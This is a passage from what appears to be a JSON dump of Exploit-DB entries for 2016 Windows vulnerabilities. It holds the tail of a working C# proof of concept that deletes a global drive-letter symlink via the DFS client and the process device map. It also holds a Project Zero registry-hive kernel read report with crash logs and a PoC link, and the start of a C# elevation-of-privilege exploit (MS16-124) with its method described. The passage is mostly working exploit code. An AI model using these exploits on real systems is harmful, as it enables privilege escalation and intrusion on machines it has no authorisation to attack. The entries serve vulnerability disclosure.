base(owns_handle)\r\n {\r\n SetHandle(handle);\r\n }\r\n\r\n protected override bool ReleaseHandle()\r\n {\r\n if (!IsInvalid)\r\n {\r\n NtClose(this.handle);\r\n this.handle = IntPtr.Zero;\r\n return true;\r\n }\r\n return false;\r\n }\r\n }\r\n\r\n public enum SecurityImpersonationLevel\r\n {\r\n Anonymous = 0,\r\n Identification = 1,\r\n Impersonation = 2,\r\n Delegation = 3\r\n }\r\n\r\n public enum SecurityContextTrackingMode : byte\r\n {\r\n Static = 0,\r\n Dynamic = 1\r\n }\r\n\r\n [StructLayout(LayoutKind.Sequential)]\r\n public sealed class SecurityQualityOfService\r\n {\r\n int Length;\r\n public SecurityImpersonationLevel ImpersonationLevel;\r\n public SecurityContextTrackingMode ContextTrackingMode;\r\n [MarshalAs(UnmanagedType.U1)]\r\n public bool EffectiveOnly;\r\n\r\n public SecurityQualityOfService()\r\n {\r\n Length = Marshal.SizeOf(this);\r\n }\r\n }\r\n\r\n [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]\r\n public sealed class ObjectAttributes : IDisposable\r\n {\r\n int Length;\r\n IntPtr RootDirectory;\r\n IntPtr ObjectName;\r\n AttributeFlags Attributes;\r\n IntPtr SecurityDescriptor;\r\n IntPtr SecurityQualityOfService;\r\n\r\n private static IntPtr AllocStruct(object s)\r\n {\r\n int size = Marshal.SizeOf(s);\r\n IntPtr ret = Marshal.AllocHGlobal(size);\r\n Marshal.StructureToPtr(s, ret, false);\r\n return ret;\r\n }\r\n\r\n private static void FreeStruct(ref IntPtr p, Type struct_type)\r\n {\r\n Marshal.DestroyStructure(p, struct_type);\r\n Marshal.FreeHGlobal(p);\r\n p = IntPtr.Zero;\r\n }\r\n\r\n public ObjectAttributes() : this(AttributeFlags.None)\r\n {\r\n }\r\n\r\n public ObjectAttributes(string object_name, AttributeFlags attributes) : this(object_name, attributes, null, null, null)\r\n {\r\n }\r\n\r\n public ObjectAttributes(AttributeFlags attributes) : this(null, attributes, null, null, null)\r\n {\r\n }\r\n\r\n public ObjectAttributes(string object_name) : this(object_name, AttributeFlags.CaseInsensitive, null, null, null)\r\n {\r\n }\r\n\r\n public ObjectAttributes(string object_name, AttributeFlags attributes, SafeKernelObjectHandle root, SecurityQualityOfService sqos, GenericSecurityDescriptor security_descriptor)\r\n {\r\n Length = Marshal.SizeOf(this);\r\n if (object_name != null)\r\n {\r\n ObjectName = AllocStruct(new UnicodeString(object_name));\r\n }\r\n Attributes = attributes;\r\n if (sqos != null)\r\n {\r\n SecurityQualityOfService = AllocStruct(sqos);\r\n }\r\n if (root != null)\r\n RootDirectory = root.DangerousGetHandle();\r\n if (security_descriptor != null)\r\n {\r\n byte[] sd_binary = new byte[security_descriptor.BinaryLength];\r\n security_descriptor.GetBinaryForm(sd_binary, 0);\r\n SecurityDescriptor = Marshal.AllocHGlobal(sd_binary.Length);\r\n Marshal.Copy(sd_binary, 0, SecurityDescriptor, sd_binary.Length);\r\n }\r\n }\r\n\r\n public void Dispose()\r\n {\r\n if (ObjectName != IntPtr.Zero)\r\n {\r\n FreeStruct(ref ObjectName, typeof(UnicodeString));\r\n }\r\n if (SecurityQualityOfService != IntPtr.Zero)\r\n {\r\n FreeStruct(ref SecurityQualityOfService, typeof(SecurityQualityOfService));\r\n }\r\n if (SecurityDescriptor != IntPtr.Zero)\r\n {\r\n Marshal.FreeHGlobal(SecurityDescriptor);\r\n SecurityDescriptor = IntPtr.Zero;\r\n }\r\n GC.SuppressFinalize(this);\r\n }\r\n\r\n ~ObjectAttributes()\r\n {\r\n Dispose();\r\n }\r\n }\r\n\r\n [DllImport(\"ntdll.dll\")]\r\n public static extern int NtOpenFile(\r\n out IntPtr FileHandle,\r\n FileAccessRights DesiredAccess,\r\n ObjectAttributes ObjAttr,\r\n [In] [Out] IoStatus IoStatusBlock,\r\n ShareMode ShareAccess,\r\n FileOpenOptions OpenOptions);\r\n\r\n public static void StatusToNtException(int status)\r\n {\r\n if (status < 0)\r\n {\r\n throw new NtException(status);\r\n }\r\n }\r\n\r\n public class NtException : ExternalException\r\n {\r\n [DllImport(\"kernel32.dll\", CharSet = CharSet.Unicode, SetLastError = true)]\r\n private static extern IntPtr GetModuleHandle(string modulename);\r\n\r\n [Flags]\r\n enum FormatFlags\r\n {\r\n AllocateBuffer = 0x00000100,\r\n FromHModule = 0x00000800,\r\n FromSystem = 0x00001000,\r\n IgnoreInserts = 0x00000200\r\n }\r\n\r\n [DllImport(\"kernel32.dll\", CharSet = CharSet.Unicode, SetLastError = true)]\r\n private static extern int FormatMessage(\r\n FormatFlags dwFlags,\r\n IntPtr lpSource,\r\n int dwMessageId,\r\n int dwLanguageId,\r\n out IntPtr lpBuffer,\r\n int nSize,\r\n IntPtr Arguments\r\n );\r\n\r\n [DllImport(\"kernel32.dll\")]\r\n private static extern IntPtr LocalFree(IntPtr p);\r\n\r\n private static string StatusToString(int status)\r\n {\r\n IntPtr buffer = IntPtr.Zero;\r\n try\r\n {\r\n if (FormatMessage(FormatFlags.AllocateBuffer | FormatFlags.FromHModule | FormatFlags.FromSystem | FormatFlags.IgnoreInserts,\r\n GetModuleHandle(\"ntdll.dll\"), status, 0, out buffer, 0, IntPtr.Zero) > 0)\r\n {\r\n return Marshal.PtrToStringUni(buffer);\r\n }\r\n }\r\n finally\r\n {\r\n if (buffer != IntPtr.Zero)\r\n {\r\n LocalFree(buffer);\r\n }\r\n }\r\n return String.Format(\"Unknown Error: 0x{0:X08}\", status);\r\n }\r\n\r\n public NtException(int status) : base(StatusToString(status))\r\n {\r\n }\r\n }\r\n\r\n public class SafeHGlobalBuffer : SafeHandleZeroOrMinusOneIsInvalid\r\n {\r\n public SafeHGlobalBuffer(int length)\r\n : this(Marshal.AllocHGlobal(length), length, true)\r\n {\r\n }\r\n\r\n public SafeHGlobalBuffer(IntPtr buffer, int length, bool owns_handle)\r\n : base(owns_handle)\r\n {\r\n Length = length;\r\n SetHandle(buffer);\r\n }\r\n\r\n public int Length\r\n {\r\n get; private set;\r\n }\r\n\r\n protected override bool ReleaseHandle()\r\n {\r\n if (!IsInvalid)\r\n {\r\n Marshal.FreeHGlobal(handle);\r\n handle = IntPtr.Zero;\r\n }\r\n return true;\r\n }\r\n }\r\n\r\n public class SafeStructureBuffer : SafeHGlobalBuffer\r\n {\r\n Type _type;\r\n\r\n public SafeStructureBuffer(object value) : base(Marshal.SizeOf(value))\r\n {\r\n _type = value.GetType();\r\n Marshal.StructureToPtr(value, handle, false);\r\n }\r\n\r\n protected override bool ReleaseHandle()\r\n {\r\n if (!IsInvalid)\r\n {\r\n Marshal.DestroyStructure(handle, _type);\r\n }\r\n return base.ReleaseHandle();\r\n }\r\n }\r\n\r\n public class SafeStructureOutBuffer<T> : SafeHGlobalBuffer\r\n {\r\n public SafeStructureOutBuffer() : base(Marshal.SizeOf(typeof(T)))\r\n {\r\n }\r\n\r\n public T Result\r\n {\r\n get\r\n {\r\n if (IsInvalid)\r\n throw new ObjectDisposedException(\"handle\");\r\n\r\n return Marshal.PtrToStructure<T>(handle);\r\n }\r\n }\r\n }\r\n\r\n public static SafeFileHandle OpenFile(string name, FileAccessRights DesiredAccess, ShareMode ShareAccess, FileOpenOptions OpenOptions, bool inherit)\r\n {\r\n AttributeFlags flags = AttributeFlags.CaseInsensitive;\r\n if (inherit)\r\n flags |= AttributeFlags.Inherit;\r\n using (ObjectAttributes obja = new ObjectAttributes(name, flags))\r\n {\r\n IntPtr handle;\r\n IoStatus iostatus = new IoStatus();\r\n int status = NtOpenFile(out handle, DesiredAccess, obja, iostatus, ShareAccess, OpenOptions);\r\n StatusToNtException(status);\r\n return new SafeFileHandle(handle, true);\r\n }\r\n }\r\n\r\n [DllImport(\"ntdll.dll\")]\r\n public static extern int NtDeviceIoControlFile(\r\n SafeFileHandle FileHandle,\r\n IntPtr Event,\r\n IntPtr ApcRoutine,\r\n IntPtr ApcContext,\r\n [Out] IoStatus IoStatusBlock,\r\n uint IoControlCode,\r\n byte[] InputBuffer,\r\n int InputBufferLength,\r\n byte[] OutputBuffer,\r\n int OutputBufferLength\r\n );\r\n\r\n [DllImport(\"ntdll.dll\")]\r\n public static extern int NtFsControlFile(\r\n SafeFileHandle FileHandle,\r\n IntPtr Event,\r\n IntPtr ApcRoutine,\r\n IntPtr ApcContext,\r\n [Out] IoStatus IoStatusBlock,\r\n uint FSControlCode,\r\n [In] byte[] InputBuffer,\r\n int InputBufferLength,\r\n [Out] byte[] OutputBuffer,\r\n int OutputBufferLength\r\n );\r\n\r\n [DllImport(\"ntdll.dll\")]\r\n static extern int NtCreateDirectoryObject(out IntPtr Handle, DirectoryAccessRights DesiredAccess, ObjectAttributes ObjectAttributes);\r\n\r\n [DllImport(\"ntdll.dll\")]\r\n static extern int NtOpenDirectoryObject(out IntPtr Handle, DirectoryAccessRights DesiredAccess, ObjectAttributes ObjectAttributes);\r\n\r\n const int ProcessDeviceMap = 23;\r\n \r\n [DllImport(\"ntdll.dll\")]\r\n static extern int NtSetInformationProcess(\r\n\t IntPtr ProcessHandle,\r\n\t int ProcessInformationClass,\r\n byte[] ProcessInformation,\r\n int ProcessInformationLength);\r\n \r\n const uint CREATE_DRIVE_LETTER = 0x601E0;\r\n const uint DELETE_DRIVE_LETTER = 0x601E4;\r\n\r\n [StructLayout(LayoutKind.Sequential)]\r\n struct DFsCreateDriveParameters\r\n {\r\n public ushort unk0; // 0\r\n public ushort flags; // 1\r\n public uint some_cred_value; // 2 \r\n public ushort drive_path_length; // 4 - Length of drive letter path\r\n public ushort dfs_path_length; // 5 - Can't be zero, think this is length of DFS path\r\n public ushort creds_length; // 6\r\n public ushort password_length; // 7 - If set this + 2 must be < length 3\r\n public ushort length_5; // 8\r\n public ushort length_6; // 9\r\n // From here is the data \r\n }\r\n\r\n static byte[] StructToBytes(object o)\r\n {\r\n int size = Marshal.SizeOf(o);\r\n IntPtr p = Marshal.AllocHGlobal(size);\r\n try\r\n {\r\n Marshal.StructureToPtr(o, p, false);\r\n byte[] ret = new byte[size];\r\n Marshal.Copy(p, ret, 0, size);\r\n return ret;\r\n }\r\n finally\r\n {\r\n if (p != IntPtr.Zero)\r\n Marshal.FreeHGlobal(p);\r\n }\r\n }\r\n\r\n static byte[] GetBytes(string s)\r\n {\r\n return Encoding.Unicode.GetBytes(s + \"\\0\");\r\n }\r\n\r\n static void MountDfsShare(string dfs_path, string drive_path)\r\n {\r\n using (SafeFileHandle handle = OpenFile(@\"\\Device\\DfsClient\", FileAccessRights.MaximumAllowed, ShareMode.None, FileOpenOptions.None, false))\r\n {\r\n IoStatus status = new IoStatus();\r\n\r\n byte[] dfs_path_bytes = GetBytes(dfs_path);\r\n byte[] drive_path_bytes = GetBytes(drive_path);\r\n DFsCreateDriveParameters create_drive = new DFsCreateDriveParameters();\r\n\r\n create_drive.drive_path_length = (ushort)drive_path_bytes.Length;\r\n create_drive.dfs_path_length = (ushort)dfs_path_bytes.Length;\r\n\r\n List<byte> buffer = new List<byte>();\r\n buffer.AddRange(StructToBytes(create_drive));\r\n buffer.AddRange(drive_path_bytes);\r\n buffer.AddRange(dfs_path_bytes);\r\n\r\n StatusToNtException(NtFsControlFile(handle, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero, status, CREATE_DRIVE_LETTER, buffer.ToArray(), buffer.Count, new byte[0], 0));\r\n }\r\n }\r\n\r\n static void UnmountDfsShare(string drive_path)\r\n {\r\n using (SafeFileHandle handle = OpenFile(@\"\\Device\\DfsClient\", FileAccessRights.MaximumAllowed, ShareMode.None, FileOpenOptions.None, false))\r\n {\r\n List<byte> buffer = new List<byte>();\r\n buffer.AddRange(new byte[4]);\r\n buffer.AddRange(GetBytes(drive_path)); \r\n byte[] output_data = new byte[8];\r\n IoStatus status = new IoStatus();\r\n StatusToNtException(NtFsControlFile(handle, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero,\r\n status, DELETE_DRIVE_LETTER, buffer.ToArray(), buffer.Count, output_data, output_data.Length));\r\n }\r\n }\r\n\r\n static SafeKernelObjectHandle CreateDirectory(string path)\r\n {\r\n using (ObjectAttributes obja = new ObjectAttributes(path, AttributeFlags.CaseInsensitive))\r\n {\r\n IntPtr handle;\r\n StatusToNtException(NtCreateDirectoryObject(out handle, DirectoryAccessRights.GenericAll, obja));\r\n return new SafeKernelObjectHandle(handle, true);\r\n }\r\n }\r\n\r\n static SafeKernelObjectHandle OpenDirectory(string path)\r\n {\r\n using (ObjectAttributes obja = new ObjectAttributes(path, AttributeFlags.CaseInsensitive))\r\n {\r\n IntPtr handle;\r\n StatusToNtException(NtOpenDirectoryObject(out handle, DirectoryAccessRights.MaximumAllowed, obja));\r\n return new SafeKernelObjectHandle(handle, true);\r\n }\r\n }\r\n\r\n [DllImport(\"ntdll.dll\")]\r\n static extern int NtOpenSymbolicLinkObject(\r\n out IntPtr LinkHandle,\r\n GenericAccessRights DesiredAccess,\r\n ObjectAttributes ObjectAttributes\r\n );\r\n\r\n [DllImport(\"ntdll.dll\")]\r\n static extern int NtMakeTemporaryObject(SafeKernelObjectHandle ObjectHandle);\r\n\r\n static SafeKernelObjectHandle OpenSymbolicLink(SafeKernelObjectHandle directory, string path, GenericAccessRights access_rights)\r\n {\r\n using (ObjectAttributes obja = new ObjectAttributes(path, AttributeFlags.CaseInsensitive, directory, null, null))\r\n {\r\n IntPtr handle;\r\n if (NtOpenSymbolicLinkObject(out handle, access_rights, obja) != 0)\r\n {\r\n return null;\r\n }\r\n\r\n return new SafeKernelObjectHandle(handle, true);\r\n }\r\n }\r\n\r\n static void SetDosDirectory(SafeKernelObjectHandle directory)\r\n {\r\n IntPtr p = directory.DangerousGetHandle();\r\n byte[] data = null;\r\n if (IntPtr.Size == 4)\r\n {\r\n data = BitConverter.GetBytes(p.ToInt32());\r\n }\r\n else\r\n {\r\n data = BitConverter.GetBytes(p.ToInt64());\r\n }\r\n\r\n StatusToNtException(NtSetInformationProcess(new IntPtr(-1), ProcessDeviceMap, data, data.Length));\r\n }\r\n\r\n static void Main(string[] args)\r\n {\r\n try\r\n {\r\n if (args.Length < 2)\r\n {\r\n Console.WriteLine(@\"DeleteGlobalDrivePoC \\\\dfs\\share X:\");\r\n return;\r\n }\r\n\r\n string dfs_path = args[0];\r\n string drive_path = args[1];\r\n\r\n if (!Path.IsPathRooted(dfs_path) || !dfs_path.StartsWith(@\"\\\\\"))\r\n throw new ArgumentException(\"DFS path must be a UNC path\");\r\n if (drive_path.Length != 2 || !Char.IsLetter(drive_path[0]) || drive_path[1] != ':')\r\n throw new ArgumentException(\"Drive letter must of form X:\");\r\n\r\n SafeKernelObjectHandle dir = CreateDirectory(null);\r\n\r\n SafeKernelObjectHandle global = OpenDirectory(@\"\\GLOBAL??\");\r\n using (SafeKernelObjectHandle symlink = OpenSymbolicLink(global, drive_path, GenericAccessRights.GenericRead))\r\n {\r\n if (symlink == null)\r\n {\r\n Console.WriteLine(\"[ERROR]: Drive letter does existing in global device directory\");\r\n return;\r\n } \r\n }\r\n\r\n SetDosDirectory(dir);\r\n MountDfsShare(dfs_path, drive_path);\r\n SetDosDirectory(global);\r\n UnmountDfsShare(drive_path);\r\n\r\n using (SafeKernelObjectHandle symlink = OpenSymbolicLink(global, drive_path, GenericAccessRights.GenericRead))\r\n {\r\n if (symlink == null)\r\n {\r\n Console.WriteLine(\"[SUCCESS]: Deleted the {0} symlink\", drive_path);\r\n }\r\n else\r\n {\r\n Console.WriteLine(\"[ERROR]: Symlink still in global directory\");\r\n }\r\n }\r\n }\r\n catch (Exception ex)\r\n {\r\n Console.WriteLine(\"[ERROR]: {0}\", ex.Message);\r\n }\r\n }\r\n }\r\n}\r\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/40572/"}, {"lastseen": "2016-10-21T01:29:53", "description": "Windows Kernel - Registry Hive Loading Relative Arbitrary Read in nt!RtlValidRelativeSecurityDescriptor (MS16-123). CVE-2016-3376. Dos exploit for Windows pl...", "published": "2016-10-20T00:00:00", "type": "exploitdb", "title": "Windows Kernel - Registry Hive Loading Relative Arbitrary Read in nt!RtlValidRelativeSecurityDescriptor (MS16-123)", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-3376"], "modified": "2016-10-20T00:00:00", "id": "EDB-ID:40601", "href": "https://www.exploit-db.com/exploits/40601/", "sourceData": "Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=876\r\n\r\nWe have encountered a Windows kernel crash in the nt!RtlValidRelativeSecurityDescriptor function invoked by nt!CmpValidateHiveSecurityDescriptors while loading corrupted registry hive files. An example of a crash log excerpt generated after triggering the bug is shown below:\r\n\r\n---\r\nKERNEL_MODE_EXCEPTION_NOT_HANDLED_M (1000008e)\r\nThis is a very common bugcheck. Usually the exception address pinpoints\r\nthe driver/function that caused the problem. Always note this address\r\nas well as the link date of the driver/image that contains this address.\r\nSome common problems are exception code 0x80000003. This means a hard\r\ncoded breakpoint or assertion was hit, but this system was booted\r\n/NODEBUG. This is not supposed to happen as developers should never have\r\nhardcoded breakpoints in retail code, but ...\r\nIf this happens, make sure a debugger gets connected, and the\r\nsystem is booted /DEBUG. This will let us see why this breakpoint is\r\nhappening.\r\nArguments:\r\nArg1: c0000005, The exception code that was not handled\r\nArg2: 81815974, The address that the exception occurred at\r\nArg3: 80795644, Trap Frame\r\nArg4: 00000000\r\n\r\nDebugging Details:\r\n------------------\r\n\r\n[...]\r\n\r\nSTACK_TEXT: \r\n807956c4 81814994 a4f3f098 0125ffff 00000000 nt!RtlValidRelativeSecurityDescriptor+0x5b\r\n807956fc 818146ad 03010001 80795728 80795718 nt!CmpValidateHiveSecurityDescriptors+0x24b\r\n8079573c 8181708f 03010001 80000560 80000540 nt!CmCheckRegistry+0xd8\r\n80795798 817eafa0 80795828 00000002 00000000 nt!CmpInitializeHive+0x55c\r\n8079585c 817ebd85 80795bb8 00000000 807959f4 nt!CmpInitHiveFromFile+0x1be\r\n807959c0 817f3aae 80795bb8 80795a88 80795a0c nt!CmpCmdHiveOpen+0x50\r\n80795acc 817ec3b8 80795b90 80795bb8 00000010 nt!CmLoadKey+0x459\r\n80795c0c 81682dc6 002afc90 00000000 00000010 nt!NtLoadKeyEx+0x56c\r\n80795c0c 77066bf4 002afc90 00000000 00000010 nt!KiSystemServicePostCall\r\nWARNING: Frame IP not in any known module. Following frames may be wrong.\r\n002afcf8 00000000 00000000 00000000 00000000 0x77066bf4\r\n\r\n[...]\r\n\r\nFOLLOWUP_IP: \r\nnt!RtlValidRelativeSecurityDescriptor+5b\r\n81815974 803801 cmp byte ptr [eax],1\r\n---\r\n\r\nThe bug seems to be caused by insufficient verification of the security descriptor length passed to the nt!RtlValidRelativeSecurityDescriptor function. An inadequately large length can render the verification of any further offsets useless, which is what happens in this particular instance. Even though the nt!RtlpValidateSDOffsetAndSize function is called to sanitize each offset in the descriptor used to access memory, it returns success due to operating on falsely large size. This condition can be leveraged to get the kernel to dereference any address relative to the pool allocation, which may lead to system crash or disclosure of kernel-mode memory. We have not investigated if the bug may allow out-of-bounds memory write access, but if that is the case, its severity would be further elevated.\r\n\r\nThe issue reproduces on Windows 7 and 8.1. In order to reproduce the problem with the provided sample, it is necessary to load it with a dedicated program which calls the RegLoadAppKey() API.\r\n\r\nAttached is a proof of concept hive file.\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40601.zip\r\n\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/40601/"}, {"lastseen": "2016-10-19T01:30:29", "description": "Windows DeviceApi CMApi - User Hive Impersonation Privilege Escalation (MS16-124). CVE-2016-0073. Local exploit for Windows platform", "published": "2016-10-18T00:00:00", "type": "exploitdb", "title": "Windows DeviceApi CMApi - User Hive Impersonation Privilege Escalation (MS16-124)", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-0073"], "modified": "2016-10-18T00:00:00", "id": "EDB-ID:40574", "href": "https://www.exploit-db.com/exploits/40574/", "sourceData": "/*\r\nSource: https://bugs.chromium.org/p/project-zero/issues/detail?id=875\r\n\r\nWindows: DeviceApi CMApi User Hive Impersonation EoP\r\nPlatform: Windows 10 10586 not tested 8.1 Update 2 or Windows 7\r\nClass: Elevation of Privilege\r\n\r\nSummary:\r\nThe DeviceApi CMApi PnpCtxRegOpenCurrentUserKey function doesn\u2019t check the impersonation level of the current effective token allowing a normal user to create arbitrary registry keys in another user\u2019s loaded hive leading to elevation of privilege.\r\n\r\nDescription:\r\n\r\nFor some of the CMApi IOCTLs you can specify a flag, 0x100 which indicates you want the keys to opened in the user\u2019s hive rather than the system hive. It finds the root key by calling PnpCtxRegOpenCurrentUserKey which calls ZwQueryInformationToken for the TOKEN_USER structure, converts the SID to a string, appends it to \\Registry\\User and opens the key in kernel mode. No part of this process verifies that the effective token isn\u2019t an impersonation token at identification level, this means that capturing another user\u2019s token, or using something like S4U we can impersonate another logged on user and write registry keys into their hive. Combined with the fact that registry keys are created with kernel privileges (even when dealing with user hives, when it clearly shouldn\u2019t) when the keys are actually created the access check is bypassed.\r\n\r\nThe obvious way of exploiting this is to use the PiCMOpenDeviceKey IOCTL I\u2019ve already reported in issue 34167. We can do a similar trick but instead symlink to keys inside the user\u2019s hive to get elevation. One issue is that when the keys are created in kernel mode they\u2019ll typically not be accessible by the user due to the default inherited permissions on a user\u2019s hive. However there\u2019s a winnable race between when the user hive is accessed and when the keys are created, by clearing the thread token from another thread at the right moment the user hive will be the target user but the keys are created as the current user. While this doesn\u2019t directly give us access to the keys through the DACL it does mark us as the owner of the key and so we can open it for WRITE_DAC access and change the DACL to give us access, then do a similar symlink trick to 34167 to elevate privileges.\r\n\r\nProof of Concept:\r\n\r\nI\u2019ve provided a PoC as a C# source code file. You need to compile it first targeted .NET 4 and above. It requires some setup first, to create the other user. Also this only demonstrates the arbitrary creation, it doesn\u2019t attempt to win the race condition. \r\n\r\n1) Compile the C# source code file.\r\n2) Create a second user on the local system as an admin, start a program running as that user so that their hive is loaded (using either runas or fast user switching).\r\n3) Execute the PoC executable as a normal user, passing as an argument the name of the other user\r\n3) The PoC should print that it failed to get the key (this is related to the key being opened under identification level impersonation) however using a registry viewer observe that under HKU\\User-SID\\SYSTEM\\CurrentControlSet\\Enum the device key\u2019s been created.\r\n\r\nExpected Result:\r\nThe key access should fail\r\n\r\nObserved Result:\r\nThe key creation succeeds inside the other user\u2019s hive.\r\n*/\r\n\r\nusing Microsoft.Win32;\r\nusing Microsoft.Win32.SafeHandles;\r\nusing System;\r\nusing System.Collections.Generic;\r\nusing System.Diagnostics;\r\nusing System.Linq;\r\nusing System.Net;\r\nusing System.Runtime.InteropServices;\r\nusing System.Security.Principal;\r\n\r\nnamespace PoC\r\n{\r\n /// <remarks>\r\n /// This sample uses S4U security, which requires Windows Server 2003 and a W2003 domain controller\r\n /// Copied from pinvoke.net with minor changes to get it to actually work.\r\n /// </remarks>\r\n public sealed class CCWinLogonUtilities\r\n {\r\n private CCWinLogonUtilities()\r\n {\r\n }\r\n\r\n #region \"Win32 stuff\"\r\n private class Win32\r\n {\r\n internal class OSCalls\r\n {\r\n public enum WinStatusCodes : uint\r\n {\r\n STATUS_SUCCESS = 0\r\n }\r\n\r\n public enum WinErrors : uint\r\n {\r\n NO_ERROR = 0,\r\n }\r\n public enum WinLogonType\r\n {\r\n LOGON32_LOGON_INTERACTIVE = 2,\r\n LOGON32_LOGON_NETWORK = 3,\r\n LOGON32_LOGON_BATCH = 4,\r\n LOGON32_LOGON_SERVICE = 5,\r\n LOGON32_LOGON_UNLOCK = 7,\r\n LOGON32_LOGON_NETWORK_CLEARTEXT = 8,\r\n LOGON32_LOGON_NEW_CREDENTIALS = 9\r\n }\r\n\r\n // SECURITY_LOGON_TYPE\r\n public enum SecurityLogonType\r\n {\r\n Interactive = 2, // Interactively logged on (locally or remotely)\r\n Network, // Accessing system via network\r\n Batch, // Started via a batch queue\r\n Service, // Service started by service controller\r\n Proxy, // Proxy logon\r\n Unlock, // Unlock workstation\r\n NetworkCleartext, // Network logon with cleartext credentials\r\n NewCredentials, // Clone caller, new default credentials\r\n RemoteInteractive, // Remote, yet interactive. Terminal server\r\n CachedInteractive, // Try cached credentials without hitting the net.\r\n CachedRemoteInteractive, // Same as RemoteInteractive, this is used internally for auditing purpose\r\n CachedUnlock // Cached Unlock workstation\r\n }\r\n\r\n [StructLayout(LayoutKind.Sequential)]\r\n public struct LSA_UNICODE_STRING\r\n {\r\n public UInt16 Length;\r\n public UInt16 MaximumLength;\r\n public IntPtr Buffer;\r\n }\r\n\r\n [StructLayout(LayoutKind.Sequential)]\r\n public struct TOKEN_SOURCE\r\n {\r\n public TOKEN_SOURCE(string name)\r\n {\r\n SourceName = new byte[8];\r\n System.Text.Encoding.GetEncoding(1252).GetBytes(name, 0, name.Length, SourceName, 0);\r\n if (!AllocateLocallyUniqueId(out SourceIdentifier))\r\n throw new System.ComponentModel.Win32Exception();\r\n }\r\n\r\n [MarshalAs(UnmanagedType.ByValArray, SizeConst = 8)]\r\n public byte[] SourceName;\r\n public UInt64 SourceIdentifier;\r\n }\r\n\r\n [StructLayout(LayoutKind.Sequential)]\r\n public struct QUOTA_LIMITS\r\n {\r\n UInt32 PagedPoolLimit;\r\n UInt32 NonPagedPoolLimit;\r\n UInt32 MinimumWorkingSetSize;\r\n UInt32 MaximumWorkingSetSize;\r\n UInt32 PagefileLimit;\r\n Int64 TimeLimit;\r\n }\r\n\r\n [StructLayout(LayoutKind.Sequential)]\r\n public struct LSA_STRING\r\n {\r\n public UInt16 Length;\r\n public UInt16 MaximumLength;\r\n public /*PCHAR*/ IntPtr Buffer;\r\n }\r\n\r\n public class LsaStringWrapper : IDisposable\r\n {\r\n public LSA_STRING _string;\r\n\r\n public LsaStringWrapper(string value)\r\n {\r\n _string = new LSA_STRING();\r\n _string.Length = (ushort)value.Length;\r\n _string.MaximumLength = (ushort)value.Length;\r\n _string.Buffer = Marshal.StringToHGlobalAnsi(value);\r\n }\r\n\r\n ~LsaStringWrapper()\r\n {\r\n Dispose(false);\r\n }\r\n\r\n private void Dispose(bool disposing)\r\n {\r\n if (_string.Buffer != IntPtr.Zero)\r\n {\r\n Marshal.FreeHGlobal(_string.Buffer);\r\n _string.Buffer = IntPtr.Zero;\r\n }\r\n if (disposing)\r\n GC.SuppressFinalize(this);\r\n }\r\n\r\n #region IDisposable Members\r\n\r\n public void Dispose()\r\n {\r\n Dispose(true);\r\n }\r\n\r\n #endregion\r\n }\r\n\r\n public class KerbS4ULogon : IDisposable\r\n {\r\n [StructLayout(LayoutKind.Sequential)]\r\n public struct KERB_S4U_LOGON\r\n {\r\n public Int32 MessageType; // Should be 12\r\n public Int32 Flags; // Reserved, should be 0\r\n public LSA_UNICODE_STRING ClientUpn; // REQUIRED: UPN for client\r\n public LSA_UNICODE_STRING ClientRealm; // Optional: Client Realm, if known\r\n }\r\n\r\n public KerbS4ULogon(string clientUpn) : this(clientUpn, null)\r\n {\r\n }\r\n\r\n public KerbS4ULogon(string clientUpn, string clientRealm)\r\n {\r\n int clientUpnLen = (clientUpn == null) ? 0 : clientUpn.Length;\r\n int clientRealmLen = (clientRealm == null) ? 0 : clientRealm.Length;\r\n _bufferLength = Marshal.SizeOf(typeof(KERB_S4U_LOGON)) + 2 * (clientUpnLen + clientRealmLen);\r\n _bufferContent = Marshal.AllocHGlobal(_bufferLength);\r\n if (_bufferContent == IntPtr.Zero)\r\n throw new OutOfMemoryException(\"Could not allocate memory for KerbS4ULogon structure\");\r\n try\r\n {\r\n KERB_S4U_LOGON baseStructure = new KERB_S4U_LOGON();\r\n baseStructure.MessageType = 12; // KerbS4ULogon\r\n baseStructure.Flags = 0;\r\n baseStructure.ClientUpn.Length = (UInt16)(2 * clientUpnLen);\r\n baseStructure.ClientUpn.MaximumLength = (UInt16)(2 * clientUpnLen);\r\n IntPtr curPtr = new IntPtr(_bufferContent.ToInt64() + Marshal.SizeOf(typeof(KERB_S4U_LOGON)));\r\n\r\n if (clientUpnLen > 0)\r\n {\r\n baseStructure.ClientUpn.Buffer = curPtr;\r\n Marshal.Copy(clientUpn.ToCharArray(), 0, curPtr, clientUpnLen);\r\n curPtr = new IntPtr(curPtr.ToInt64() + clientUpnLen * 2);\r\n }\r\n else\r\n baseStructure.ClientUpn.Buffer = IntPtr.Zero;\r\n baseStructure.ClientRealm.Length = (UInt16)(2 * clientRealmLen);\r\n baseStructure.ClientRealm.MaximumLength = (UInt16)(2 * clientRealmLen);\r\n if (clientRealmLen > 0)\r\n {\r\n baseStructure.ClientRealm.Buffer = curPtr;\r\n Marshal.Copy(clientRealm.ToCharArray(), 0, curPtr, clientRealmLen);\r\n }\r\n else\r\n baseStructure.ClientRealm.Buffer = IntPtr.Zero;\r\n Marshal.StructureToPtr(baseStructure, _bufferContent, false);\r\n }\r\n catch\r\n {\r\n Dispose(true);\r\n throw;\r\n }\r\n }\r\n\r\n private IntPtr _bufferContent;\r\n private int _bufferLength;\r\n\r\n public IntPtr Ptr\r\n {\r\n get { return _bufferContent; }\r\n }\r\n\r\n public int Length\r\n {\r\n get { return _bufferLength; }\r\n }\r\n\r\n private void Dispose(bool disposing)\r\n {\r\n if (_bufferContent != IntPtr.Zero)\r\n {\r\n Marshal.FreeHGlobal(_bufferContent);\r\n _bufferContent = IntPtr.Zero;\r\n }\r\n if (disposing)\r\n GC.SuppressFinalize(this);\r\n }\r\n\r\n ~KerbS4ULogon()\r\n 